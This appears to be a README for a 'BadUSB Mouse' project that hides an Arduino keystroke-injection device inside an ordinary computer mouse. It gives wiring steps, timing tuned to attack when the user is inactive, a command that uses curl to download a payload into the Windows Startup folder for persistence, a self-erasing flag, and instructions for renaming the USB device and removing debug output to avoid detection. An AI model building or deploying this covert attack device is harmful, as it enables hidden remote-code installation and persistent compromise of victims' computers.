BadUSB Mouse Project

Project Overview

The BadUSB Mouse is a modified USB device that mimics a keyboard but is embedded within a standard USB computer mouse. It executes a malicious payload when connected to a host computer without any obvious signs of its presence, making it more discreet than a traditional BadUSB device.

Key Features

• Detection of the host operating system using HID protocol.
• Use of a phototransistor to check for mouse LED activity to determine the best time to execute the payload.
• Self-destruct feature that disables the Arduino after successful payload execution.

Hardware Requirements

• Arduino Pro Micro
• USB 2.0 Expansion Module
• 5mm Phototransistor
• 120 Ohm Resistor
• 26 AWG or similar Wire
• Micro USB Solderable Plug or a spliced phone cable
• Soldering Iron & Solder

Wiring How-To

This section provides detailed, step-by-step instructions on how to integrate the Arduino into the mouse hardware along with a USB hub and a phototransistor. Follow these steps carefully, and refer to the wiring diagram for visual guidance.

1. Preparing the Mouse Cable: Remove the USB connector from the mouse motherboard. Cut off the end connector, then strip the four wires (data+, data-, positive, and ground).
2. Wiring the Mouse to the USB Hub: Connect these four wires to the USB_IN line on the USB hub, labeled on the back side of the hub. Ensure the connections match the standard USB layout:
   • Red: Positive wire, carries 5V direct current.
   • Black: Ground wire.
   • White: Positive data (D+).
   • Green: Negative data (D-).
3. Connecting the Arduino: Solder four wires to a micro USB solderable plug and connect these wires to another set of USB pins on the USB hub. Be mindful of matching the wire connections correctly. Connect the micro USB plug to the Arduino.
4. Reconnecting the Mouse USB: Solder four additional wires to the bottom pads where the USB connector was originally attached to the mouse, and connect these wires to another set of USB pins on the USB hub. Ensure correct wiring alignment.
5. Wiring the Phototransistor: Solder the positive lead of the phototransistor (the longer one) to a 120-ohm resistor, then connect this lead to pin A2 on the Arduino. Solder the other, shorter side of the phototransistor to ground.
6. Positioning the Phototransistor: Position the photodiode so that its top faces the internal mouse LED to capture lighting changes. Adjust the activeSensorValue based on the brightness of the LED, which may vary between mouse models. This adjustment can be made by adding a serial debug statement to continuously print out the sensor value.
7. Securing Components: Glue the components in place atop the mouse motherboard. Depending on the mouse model, you may need to modify the plastic housing inside the mouse (using clippers or a Dremel) to accommodate the new components.

Ensure all connections are secure and double-check for any potential shorts. For more clarity, see the included wiring diagram:

Using the Program

This program is designed to operate with specific pin settings and timing variables to effectively deploy a payload on Windows systems. Below are instructions on how to adjust key parameters and deploy the payload safely and effectively.

Pin Configuration

Do not change the pin configuration unless necessary, as they are set to match the hardware setup:

• photoTransistorPin: Analog pin A2, used for the phototransistor sensor.
• VCCPin: Digital pin 15, used as VCC.
• GNDPin: Digital pin 16, used as ground.

Timing Variables

Adjust the following timing variables based on the environmental conditions and the Windows system you are targeting:

• interval (500 ms): Frequency at which the sensor checks are performed.
• bootTime (5000 ms): Wait time after the device is powered on, allowing the PC to boot.
• inactiveTime (5000 ms): Duration to consider the mouse inactive if no movement is detected.
• lockToCoverScreenTime (65000 ms): Time to wait for the Windows lock screen to revert to the cover screen.
• activeSensorCount (500): Count of sensor readings indicating active mouse usage before considering the mouse active.
• activeSensorValue (1016): Sensor reading threshold to determine mouse activity. Adjust based on your phototransistor's sensitivity.

Payload Execution

To modify the payload, alter the command within the executePayload function:

Keyboard.print("cmd /c curl -L URL -o \"%APPDATA%/Microsoft/Windows/Start Menu/Programs/Startup/Pagefile.vbs\" >nul 2>&1");

Replace the URL and file path as needed for your specific payload. Ensure that the commands are compatible with the Windows command line interface.

Operational Flow

Upon startup, the device checks if it has executed the payload previously through EEPROM state checking. If the payload has not been executed, it continues with the boot process, waiting for the PC to boot, and detecting mouse and system activity to determine the optimal time to deploy the payload.

Compatibility

Currently, this program is designed to work exclusively with Windows-based systems. It leverages specific Windows features, such as the "Run" dialog and keyboard shortcuts, to execute its payload effectively.

Support for Mac and Linux systems is under development, focusing on adapting to different system behaviors and command execution methods specific to these platforms.

Resetting the Device

If you need to reset the device and clear the EEPROM:

// To reset the EEPROM, short pin 8 to ground momentarily. This clears the flag and allows the payload to be executed again.
EEPROM.write(0, 0);

Debugging

For debugging purposes, use the serial output to monitor the status and operation of the device. Ensure to disable or remove serial debugging in the final deployment to avoid detection.

Renaming the Arduino Device for Obfuscation

To further disguise your BadUSB Mouse device, you can rename its identification to something less suspicious, such as "USB Device". This process involves using the Musinou hardware library to customize the USB device name.

Steps to Rename Your Arduino Device:

1. Download the Musinou Hardware Library: Download and extract the Musinou hardware configuration files from this link and place them under /Users/username/Documents/Arduino/hardware/ on your computer.

2. Modify Device Settings: Close your Arduino IDE if it's open. Navigate to /Users/username/Documents/Arduino/hardware/musinou/avr/ and open the boards.txt file. Locate the lines for your Arduino model, for example:

   micromusinou.build.vid=0x2340
   micromusinou.build.pid=0x8030
   micromusinou.build.usb_product="Arduino Micro Musinou"

   Change the usb_product value to a generic name, in this case we'll make it "USB Device".

3. Save Changes and Reopen the IDE: Save the modified boards.txt file. Reopen the Arduino IDE, and select "USB Device" as the board.

4. Upload Your Code: Upload your existing BadUSB Mouse code to the Arduino. This process will install the code under the new device name, making it appear as a generic "USB Device" in system reports and connected devices lists.

5. Verify Device Name: Connect the Arduino to a computer. The device should now display with the new name "USB Device".

This renaming technique adds an extra layer of stealth, making the BadUSB Mouse less noticeable and suspicious when connected to a host computer.

Installation and Setup

Refer to the Arduino IDE for uploading the provided BadUSBMouse_Program_Arduino_Pro_Micro.ino script to the Arduino Pro Micro. Detailed wiring instructions and setup procedures can be found in the documentation linked below.

GitHub Repository

Thank you for exploring the BadUSB Mouse project. For more information or to contribute, please visit the GitHub repository linked above.